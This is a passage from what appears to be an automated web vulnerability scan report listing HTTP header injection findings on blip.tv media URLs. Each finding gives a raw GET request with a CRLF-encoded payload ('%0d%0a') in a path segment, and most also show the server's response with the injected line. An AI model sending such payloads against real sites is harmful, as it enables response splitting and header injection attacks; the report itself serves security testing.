Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/edb41
09ccf4faebb
/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv
Content-Type: text/html; charset=iso-8859-1
Content-Length: 336
Date: Thu, 20 Jan 2011 00:38:25 GMT
X-Varnish: 2146045301
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/edb41
09ccf4faebb/Pudd
...[SNIP]...

2.140. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 34f59%0d%0ac42b6f400ed was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/34f59%0d%0ac42b6f400ed HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/34f59
c42b6f400ed

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:25 GMT
X-Varnish: 344226741
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/34f59
c42b6f400ed"
...[SNIP]...

2.141. http://blip.tv/file/get/Squatters-Episode13234.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Squatters-Episode13234.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8d029%0d%0aad712a041c1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8d029%0d%0aad712a041c1/get/Squatters-Episode13234.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/8d029
ad712a041c1
/get/Squatters-Episode13234.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 324
Date: Thu, 20 Jan 2011 00:38:28 GMT
X-Varnish: 1324527425
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/8d029
ad712a041c1/get/Squat
...[SNIP]...

2.142. http://blip.tv/file/get/Squatters-Episode13234.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Squatters-Episode13234.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 199f8%0d%0a84438fc7315 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/199f8%0d%0a84438fc7315/Squatters-Episode13234.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/199f8
84438fc7315
/Squatters-Episode13234.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 310
Date: Thu, 20 Jan 2011 00:38:28 GMT
X-Varnish: 1248905335
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/199f8
84438fc7315/Squa
...[SNIP]...

2.143. http://blip.tv/file/get/Squatters-Episode13234.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Squatters-Episode13234.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 28e9d%0d%0a714b07cdff8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/28e9d%0d%0a714b07cdff8 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/28e9d
714b07cdff8

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:28 GMT
X-Varnish: 344227195
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/28e9d
714b07cdff8"
...[SNIP]...

2.144. http://blip.tv/file/get/Squatters-Episode13604.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Squatters-Episode13604.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 887de%0d%0ad8caab3d9df was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /887de%0d%0ad8caab3d9df/get/Squatters-Episode13604.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/887de
d8caab3d9df
/get/Squatters-Episode13604.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 309
Date: Thu, 20 Jan 2011 00:38:27 GMT
X-Varnish: 344227043
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/887de
d8caab3d9df/get/Squat
...[SNIP]...

2.145. http://blip.tv/file/get/Squatters-Episode13604.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Squatters-Episode13604.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9f258%0d%0a598cdcfe38c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/9f258%0d%0a598cdcfe38c/Squatters-Episode13604.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/9f258
598cdcfe38c
/Squatters-Episode13604.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 310
Date: Thu, 20 Jan 2011 00:38:28 GMT
X-Varnish: 1324527433
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/9f258
598cdcfe38c/Squa
...[SNIP]...

2.146. http://blip.tv/file/get/Squatters-Episode13604.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Squatters-Episode13604.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 374f6%0d%0a4993a0b8373 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/374f6%0d%0a4993a0b8373 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/374f6
4993a0b8373

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:28 GMT
X-Varnish: 1248905355
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/374f6
4993a0b8373"
...[SNIP]...

2.147. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e3ad0%0d%0ac27f2f30a37 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e3ad0%0d%0ac27f2f30a37/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/e3ad0
c27f2f30a37
/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 359
Date: Thu, 20 Jan 2011 00:38:26 GMT
X-Varnish: 1025266617
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/e3ad0
c27f2f30a37/get/Stupi
...[SNIP]...

2.148. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d727c%0d%0a131771b9b3c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/d727c%0d%0a131771b9b3c/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/d727c
131771b9b3c
/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 360
Date: Thu, 20 Jan 2011 00:38:26 GMT
X-Varnish: 1248905096
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/d727c
131771b9b3c/Stup
...[SNIP]...

2.149. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 72f06%0d%0ab6c0ac15760 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/72f06%0d%0ab6c0ac15760 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/get/72f06
b6c0ac15760

Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:27 GMT
X-Varnish: 1274881608
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/72f06
b6c0ac15760"
...[SNIP]...

2.150. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6a8c4%0d%0a179c2a49497 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6a8c4%0d%0a179c2a49497/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/6a8c4
179c2a49497
/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 359
Date: Thu, 20 Jan 2011 00:38:26 GMT
X-Varnish: 1025266631
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/6a8c4
179c2a49497/get/Stupi
...[SNIP]...

2.151. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c374d%0d%0add42cac7674 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/c374d%0d%0add42cac7674/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/c374d
dd42cac7674
/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 375
Date: Thu, 20 Jan 2011 00:38:26 GMT
X-Varnish: 1248905106
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/c374d
dd42cac7674/Stup
...[SNIP]...

2.152. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload cddb8%0d%0ab6166b364cf was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/cddb8%0d%0ab6166b364cf HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/cddb8
b6166b364cf

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:27 GMT
X-Varnish: 1248905149
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/cddb8
b6166b364cf"
...[SNIP]...

2.153. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3f10b%0d%0a51001ccf226 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3f10b%0d%0a51001ccf226/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/3f10b
51001ccf226
/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 339
Date: Thu, 20 Jan 2011 00:38:12 GMT
X-Varnish: 1025264822
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/3f10b
51001ccf226/get/VZW-O
...[SNIP]...

2.154. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b4092%0d%0a3b92220f3b6 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/b4092%0d%0a3b92220f3b6/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v?source=2 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/b4092
3b92220f3b6
/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v?source=2
Content-Type: text/html; charset=iso-8859-1
Content-Length: 349
Date: Thu, 20 Jan 2011 00:38:14 GMT
X-Varnish: 1498214947
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/b4092
3b92220f3b6/VZW-
...[SNIP]...

2.155. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload de003%0d%0a42b9ec182a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/de003%0d%0a42b9ec182a?source=2 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/de003
42b9ec182a
?source=2
Content-Type: text/html; charset=iso-8859-1
Content-Length: 295
Date: Thu, 20 Jan 2011 00:38:14 GMT
X-Varnish: 1498214992
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/de003
42b9ec182a?s
...[SNIP]...

2.156. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 15ea0%0d%0ae3a498f2e9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /15ea0%0d%0ae3a498f2e9/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/15ea0
e3a498f2e9
/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 353
Date: Thu, 20 Jan 2011 00:38:14 GMT
X-Varnish: 1025264990
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/15ea0
e3a498f2e9/get/VZW-Of
...[SNIP]...

2.157. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b0487%0d%0a02cb8e0b3b2 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/b0487%0d%0a02cb8e0b3b2/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/b0487
02cb8e0b3b2
/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 340
Date: Thu, 20 Jan 2011 00:38:14 GMT
X-Varnish: 1274879957
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/b0487
02cb8e0b3b2/VZW-
...[SNIP]...

2.158. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload c4bba%0d%0a09ac88edd77 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/c4bba%0d%0a09ac88edd77 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

